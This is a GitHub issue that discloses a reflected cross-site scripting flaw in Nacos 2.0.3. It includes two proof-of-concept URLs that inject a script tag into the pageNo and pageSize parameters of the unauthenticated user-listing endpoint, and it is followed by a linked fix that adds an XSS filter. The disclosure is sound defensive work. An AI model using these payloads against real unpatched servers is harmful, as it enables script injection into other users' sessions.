Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Nacos has xss vulnerability
Trigger condition: no verification required
version: Nacos 2.0.3
payload1:/nacos/v1/auth/users?pageNo=1&pageSize=<script>alert(1)</script> payload2:/nacos/v1/auth/users?pageNo=<script>alert(1)</script>&pageSize=1
/nacos/v1/auth/users?pageNo=1&pageSize=<script>alert(1)</script>
/nacos/v1/auth/users?pageNo=<script>alert(1)</script>&pageSize=1
The text was updated successfully, but these errors were encountered:
@onewe will solve it@
Sorry, something went wrong.
[ISSUE alibaba#7359] Add xss filter
5c0219d
- Set response header 'Content-Security-Policy'
duplicate with #1717
[ISSUE #7359] Add xss filter (#7364)
cd6d7e3
Successfully merging a pull request may close this issue.
Nacos has xss vulnerability
Trigger condition: no verification required
version: Nacos 2.0.3
payload1:
/nacos/v1/auth/users?pageNo=1&pageSize=<script>alert(1)</script>payload2:
/nacos/v1/auth/users?pageNo=<script>alert(1)</script>&pageSize=1The text was updated successfully, but these errors were encountered: